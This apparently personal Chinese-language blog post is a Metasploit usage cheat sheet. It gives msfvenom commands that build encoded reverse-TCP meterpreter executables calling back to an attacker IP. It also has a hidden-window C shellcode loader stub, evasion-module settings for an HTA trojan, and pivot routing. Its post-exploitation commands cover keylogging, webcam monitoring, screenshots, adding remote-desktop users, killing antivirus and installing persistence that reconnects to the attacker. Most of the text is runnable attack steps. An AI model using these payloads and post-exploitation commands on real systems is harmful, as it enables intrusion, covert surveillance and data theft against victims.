<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            msf使用
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">msf使用</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2023-04-28
                        </span>
                        
                            <span id="/2023/04/28/msf使用/" class="leancloud_visitors" data-flag-title="msf使用">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2023/04/28/msf使用/"></span>
                        </span>  
                    </p>
                    
                    
                        
                            <span class="tag-color">工具</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <ol>
<li><p>msfconsole <strong>启动msf</strong></p>
</li>
<li><p>db_connect postgres:<a href="mailto:&#104;&#x65;&#104;&#101;&#x68;&#x65;&#x40;&#49;&#x32;&#55;&#46;&#x30;&#46;&#x30;&#46;&#x31;">&#104;&#x65;&#104;&#101;&#x68;&#x65;&#x40;&#49;&#x32;&#55;&#46;&#x30;&#46;&#x30;&#46;&#x31;</a>&#x2F;test <strong>用户名，密码，地址</strong></p>
</li>
<li><p>db_status <strong>查看数据库链接状态</strong></p>
</li>
<li><p>service postgresql start <strong>开启数据库</strong></p>
</li>
<li><p>msfdb init  <strong>初始化msf数据库</strong></p>
</li>
</ol>
<h1 id="MSF模块"><a href="#MSF模块" class="headerlink" title="MSF模块"></a><a herf="MSF模块">MSF模块</a></h1><p>MSF模块</p>
<ol>
<li><p>Auxiliary(辅助模块)</p>
</li>
<li><p>Exploits (攻击模块)</p>
</li>
<li><p>Payload  (攻击载荷模块)</p>
</li>
<li><p>Post     (后渗透攻击模块)</p>
</li>
<li><p>Encoders (编码模块)</p>
</li>
</ol>
<h2 id="辅助模块"><a href="#辅助模块" class="headerlink" title="辅助模块"></a><b herf="辅助模块">辅助模块</b></h2><p>use auxiliary 有很多方法  option查看设置<br>设置好之后用run 或者exploit 攻击</p>
<h2 id="攻击模块"><a href="#攻击模块" class="headerlink" title="攻击模块"></a><c herf="攻击模块">攻击模块</c></h2><p>同辅助模块 <strong>注意有一定几率给目标打蓝屏或者重启</strong></p>
<h2 id="MSF后门生成模块"><a href="#MSF后门生成模块" class="headerlink" title="MSF后门生成模块"></a><d herf="MSF后门生成模块">MSF后门生成模块</d></h2><p>Msfvenom</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">-l, --list &lt;type&gt; </span><br><span class="line"># 列出所有可用的项目，其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等</span><br><span class="line">-p, --payload &lt;payload&gt; </span><br><span class="line"># 指定特定的 Payload，如果被设置为 - ，那么从标准输入流中读取</span><br><span class="line">--list-options </span><br><span class="line"># 列出--payload &lt;value&gt; 的标准，高级和规避选项</span><br><span class="line">-f, --format &lt;format&gt; </span><br><span class="line"># 指定 Payload 的输出格式(使用 --list formats 列出)</span><br><span class="line">-e, --encoder &lt;encoder&gt; </span><br><span class="line"># 指定使用的 Encoder (使用 --list encoders 列出)</span><br><span class="line">--sec-name &lt;value&gt; </span><br><span class="line"># 生成大型Windows二进制文件时使用的新名称。默认值：随机4个字符的字符串</span><br><span class="line">--smallest </span><br><span class="line"># 使用所有可用的编码器生成最小的payload</span><br><span class="line">--encrypt &lt;value&gt; </span><br><span class="line"># 应用于shellcode的加密或编码类型 (使用--list encrypt 列出)</span><br><span class="line">--encrypt-key &lt;value&gt; </span><br><span class="line"># 用于加密的密钥</span><br><span class="line">--encrypt-iv &lt;value&gt; </span><br><span class="line"># 加密的初始化向量</span><br><span class="line">-a, --arch &lt;arch&gt; </span><br><span class="line"># 指定目标系统架构(使用 --list archs 列出)</span><br><span class="line">--platform &lt;platform&gt; </span><br><span class="line"># 指定目标系统平台 (使用 --list platforms 列出)</span><br><span class="line">-o, --out &lt;path&gt; </span><br><span class="line"># 保存payload文件</span><br><span class="line">-b, --bad-chars &lt;list&gt; </span><br><span class="line"># 设置需要在 Payload 中避免出现的字符，如： &#x27;\x00\xff&#x27;</span><br><span class="line">-n, --nopsled &lt;length&gt; </span><br><span class="line"># 指定 nop 在 payload 中的数量</span><br><span class="line">-s, --space &lt;length&gt; </span><br><span class="line"># 设置未经编码的 Payload 的最大长度</span><br><span class="line">--encoder-space &lt;length&gt; </span><br><span class="line"># 编码后的 Payload 的最大长度</span><br><span class="line">-i, --iterations &lt;count&gt; </span><br><span class="line"># 设置 Payload 的编码次数</span><br><span class="line">-c, --add-code &lt;path&gt; </span><br><span class="line"># 指定包含一个额外的win32 shellcode文件</span><br><span class="line">-x, --template &lt;path&gt; </span><br><span class="line"># 指定一个特定的可执行文件作为模板</span><br><span class="line">-k, --keep </span><br><span class="line"># 保护模板程序的功能，注入的payload作为一个新的进程运行</span><br><span class="line">-v, --var-name &lt;value&gt; </span><br><span class="line"># 指定一个变量名（当添加 -f 参数的时候，例如 -f python，那么输出为 python 代码， payload 会被按行格式化为 python 代码，追加到一个 python 变量中，这个参数即为指定 python 变量的变量名）</span><br><span class="line">-t, --timeout &lt;second&gt; </span><br><span class="line"># 设置从STDIN读取payload的等待时间（默认为30,0为禁用）</span><br><span class="line">-h, --help </span><br><span class="line"># 帮助</span><br></pre></td></tr></table></figure>

<p>·例子：<br>msfvenom -p 有效载荷 -f 输出格式 -o 输出文件<br>msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp -f exe -o payload.exe</p>
<p>msfvenom -a 系统架构 –platform 系统平台 -p 有效载荷 lhost&#x3D;攻击机IP lport&#x3D;攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件<br>msfvenom -a x86 –platform windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp lhost&#x3D;192.168.1.120 lport&#x3D;4444 -i 3 -e x86&#x2F;shikata_ga_nai -f exe -o payload.exe</p>
<p>msfvenom —list archs        #查看支持的系统架构<br>msfvenom —list platforms    #查看支持系统平台<br>msfvenom -l payload         #列出所有可用的payload<br>msfvenom -l formats         #列出所有的输出格式<br>msfvenom -l encrypt         #列出所有的加密方式<br>msfvenom -l encoders        #列出所有的编码器</p>
<p><code>#include &quot;stdafx.h&quot;</code><br><code>#include &lt;stdio.h&gt;</code><br><code>#pragma comment( linker, &quot;/subsystem:\&quot;windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;)</code><br><code>unsigned char buf[] =</code><br><code>（这里放生成好的数组）</code><br><code>main()</code><br><code>&#123;</code><br><code>((void(*)(void))&amp;buf)();</code><br><code>&#125;</code><br>&#96;&#96;</p>
<h2 id="evasion模块"><a href="#evasion模块" class="headerlink" title="evasion模块"></a><e herf="evasion模块">evasion模块</e></h2><p>show evasion查看支持的木马类型</p>
<ul>
<li>设置payload</li>
<li>set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</li>
<li>设置攻击机IP地址</li>
<li>set lhost 192.168.25.131</li>
<li>设置攻击机的端口</li>
<li>set lport 3333</li>
<li>设置木马文件名称</li>
<li>set filename hack.hta</li>
<li>再次输入options查看我们设置的信息是否有误</li>
<li>options</li>
</ul>
<p>输入getuid查看目标主机的计算机名称，输入？获取相关更多操作的详细说明</p>
<h2 id="MSF-添加路由访问内网"><a href="#MSF-添加路由访问内网" class="headerlink" title="MSF  添加路由访问内网"></a>MSF  添加路由访问内网</h2><p>   可以先查看内网 网段信息</p>
<ol>
<li>shell</li>
<li>ipconfig</li>
</ol>
<p>在使用msf探测各网段主机信息时，我们需要先添加通往各网段的路由，这样msf才知道怎么走。我们可以添加自动路由，或者指定路由添加，我们先进入meterpreter的shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#自动添加路由</span><br><span class="line">run post/multi/manage/autoroute</span><br><span class="line">#查看路由信息</span><br><span class="line">run autoroute -p</span><br><span class="line"></span><br><span class="line">msf6 &gt; route add 192.168.10.0 255.255.255.0 1</span><br><span class="line">手动添加</span><br><span class="line"></span><br><span class="line">background之后 也可以  route查看路由</span><br><span class="line">在使用时候可以直接设置完options之后</span><br><span class="line">在设置set session xxx</span><br></pre></td></tr></table></figure>



<h2 id="Meterpreter-命令"><a href="#Meterpreter-命令" class="headerlink" title="Meterpreter 命令"></a>Meterpreter 命令</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">help# 查看Meterpreter帮助</span><br><span class="line">background#返回，把meterpreter后台挂起</span><br><span class="line">bgkill# 杀死一个背景 meterpreter 脚本</span><br><span class="line">bglist#提供所有正在运行的后台脚本的列表</span><br><span class="line">bgrun#作为一个后台线程运行脚本</span><br><span class="line">channel#显示活动频道</span><br><span class="line">sessions -i number # 与会话进行交互，number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用</span><br><span class="line">sesssions -k  number #与会话进行交互</span><br><span class="line">close# 关闭通道</span><br><span class="line">exit# 终止 meterpreter 会话</span><br><span class="line">quit# 终止 meterpreter 会话</span><br><span class="line">interact id #切换进一个信道</span><br><span class="line">run#执行一个已有的模块，这里要说的是输入run后按两下tab，会列出所有的已有的脚本，常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等</span><br><span class="line">irb# 进入 Ruby 脚本模式</span><br><span class="line">read# 从通道读取数据</span><br><span class="line">write# 将数据写入到一个通道</span><br><span class="line">run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本</span><br><span class="line">use# 加载 meterpreter 的扩展</span><br><span class="line">load/use#加载模块</span><br><span class="line">Resource#执行一个已有的rc脚本</span><br></pre></td></tr></table></figure>

<h3 id="文件系统命令"><a href="#文件系统命令" class="headerlink" title="文件系统命令"></a>文件系统命令</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">getwd 或者pwd # 查看当前工作目录  </span><br><span class="line">ls  #</span><br><span class="line">cd</span><br><span class="line">mkdir lltest2  #只能在当前目录下创建文件夹</span><br><span class="line">rmdir lltest2  #只能删除当前目录下文件夹</span><br><span class="line">getlwd   或者 lpwd   #操作攻击者主机 查看当前目录</span><br><span class="line">lcd /tmp   #操作攻击者主机 切换目录</span><br><span class="line">cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容</span><br><span class="line">upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上</span><br><span class="line">download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上</span><br><span class="line">edit c:\\1.txt #编辑或创建文件  没有的话，会新建文件</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="系统命令"><a href="#系统命令" class="headerlink" title=".系统命令"></a>.系统命令</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">getsystem       #会自动利用各种各样的系统漏洞来进行权限提升</span><br><span class="line">migrate          #进程id进程迁移</span><br><span class="line">background     #把当前的会话设置为背景，需要的时候在启用</span><br><span class="line">getuid           #查看对方正在运行的用户</span><br><span class="line">ps              #列出所有的进程</span><br><span class="line">getpid          #返回运行meterpreter的id号</span><br><span class="line">sysinfo         #产看系统信息和体系结构</span><br><span class="line">shell           #切换到cmd的系统权限方式</span><br><span class="line">exit           #退出shell会话返回meterpreter或终止meterpreter</span><br><span class="line">getdesktop    截取目标主机当前桌面会话窗口</span><br><span class="line">run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头</span><br><span class="line">keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘</span><br></pre></td></tr></table></figure>

<h3 id="远程桌面-amp-截屏"><a href="#远程桌面-amp-截屏" class="headerlink" title="远程桌面&amp;截屏"></a>远程桌面&amp;截屏</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">run getgui -e #开启远程桌面</span><br><span class="line">run getgui -u user1 -p 123   #添加用户</span><br><span class="line">run getgui -f 4444 –e   #3389端口转发到6661</span><br><span class="line">enumdesktops  #查看可用的桌面</span><br><span class="line">getdesktop    #获取当前meterpreter 关联的桌面</span><br><span class="line">set_desktop   #设置meterpreter关联的桌面  -h查看帮助</span><br><span class="line">screenshot  #截屏</span><br><span class="line">use espia  #或者使用espia模块截屏  然后输入screengrab</span><br><span class="line">run vnc  #使用vnc远程桌面连接，这方法有点问题，上传了exe但是启动不了</span><br></pre></td></tr></table></figure>

<h3 id="键盘记录"><a href="#键盘记录" class="headerlink" title="键盘记录"></a>键盘记录</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyscan_start  #开始键盘记录</span><br><span class="line">keyscan_dump   #导出记录数据</span><br><span class="line">keyscan_stop #结束键盘记录</span><br></pre></td></tr></table></figure>

<h3 id="关闭杀毒软件"><a href="#关闭杀毒软件" class="headerlink" title="关闭杀毒软件"></a>关闭杀毒软件</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run killav     //可能导致目标机器蓝屏死机</span><br></pre></td></tr></table></figure>

<h3 id="后门植入"><a href="#后门植入" class="headerlink" title="后门植入"></a>后门植入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run persistence –h  #查看帮助</span><br><span class="line">run persistence -X -i 5 -p 4444 -r 192.168.1.159</span><br><span class="line">#-X指定启动的方式为开机自启动；-i反向连接的时间间隔；–r 指定攻击者的ip</span><br></pre></td></tr></table></figure>


                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/touxiang.jpg" alt="章鱼海绵">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>章鱼海绵
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2023/04/28/msf%E4%BD%BF%E7%94%A8/" target="_blank">msf使用</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tag/%E5%B7%A5%E5%85%B7/">工具</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                        <a href="/2023/04/30/postgresql%E6%95%B0%E6%8D%AE%E5%BA%93/" class="prev-prefix">« </a> 上一篇：    <a href="/2023/04/30/postgresql%E6%95%B0%E6%8D%AE%E5%BA%93/" title="发布于 2023-04-30 04:30">postgresql数据库</a>
                        <br>
                    
                    
                        <a href="/2023/04/28/%E5%85%8D%E6%9D%80/" class="next-prefix">» </a> 下一篇：    <a href="/2023/04/28/%E5%85%8D%E6%9D%80/" title="发布于 2023-04-28 04:39">免杀</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>

        </div>
    
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>简单地活着，肆意而又精彩！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/touxiang.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span>章鱼海绵</span></div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://www.4399.com/" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://www.4399.com/" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data="/image/sidebar/weixin.png"><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/zhangyuhaimian/zhangyuhaimian.github.io" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <div class="aplayer"></div>
        <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
        <script type="text/javascript" src="/js/APlayer.min.js"></script>
        <script type="text/javascript">
            const aplayer = new APlayer({
                container: document.querySelector(".aplayer"),
                fixed: true,
                autoplay: true,
                loop: "all",
                order: "random",
                preload: "auto",
                volume: 0.67,
                mutex: true,
                lrcType: 3,
                audio: [
                    
                        {
                            name: "知我",
                            artist: "剑来",
                            cover: "/music/cover/preview.jpg",
                            url: "/music/song/知我.mp3",
                            lrc: "/music/lrc/Endless Tears.lrc"
                        },
                    
                ]
            });
        </script>
    
    
    <div class="wrap-right">
        <div class="setting">
            <div class="iconbox favorites" switch="false">
                <span class="iconfont icon-favorites"></span>
                <span class="icontext">关注</span>
            </div>
            <div class="iconbox mode">
                <div class="light">
                    <span class="iconfont icon-daymode"></span>
                    <span class="icontext">浅色模式</span>
                </div>
                <div class="dark">
                    <span class="iconfont icon-nightmode-fill"></span>
                    <span class="icontext">深色模式</span>
                </div>
            </div>
            <a href="javascript:;" target="_self" class="search">
                <div class="iconbox">
                    <span class="iconfont icon-search-menu"></span>
                    <span class="icontext">搜索</span>
                </div>
            </a>
            <div class="iconbox bottom">
                <div style="display: inline-block; transform: rotate(180deg);">
                    <span class="iconfont icon-top"></span>
                </div>
                <span class="icontext">跳至底部</span>
            </div>
        </div>
        <div class="iconbox set">
            <div style="display: inline-block;">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="iconbox top">
            <span class="iconfont icon-top"></span>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "zhangyuhaimian",
        GitHubRepositories : "zhangyuhaimian",

        User             : "章鱼海绵",
        UserAvatar       : "/image/sidebar/touxiang.jpg",
        WebsiteStartDate : "2023-02-10",

        WebsiteTitleBlur         : "(◍´꒳`◍) Hi, Live For Code",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : "/image/website/logo.png",

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/home.jpg",
            
        ],
        HomeBannerText  : "遇事不决，可问春风，春风不语，便随本心",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "遇事不决，可问春风",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "简单地活着，肆意而又精彩！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://www.4399.com/",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://www.4399.com/",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : "/image/sidebar/weixin.png"
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/zhangyuhaimian/zhangyuhaimian.github.io",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2022 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
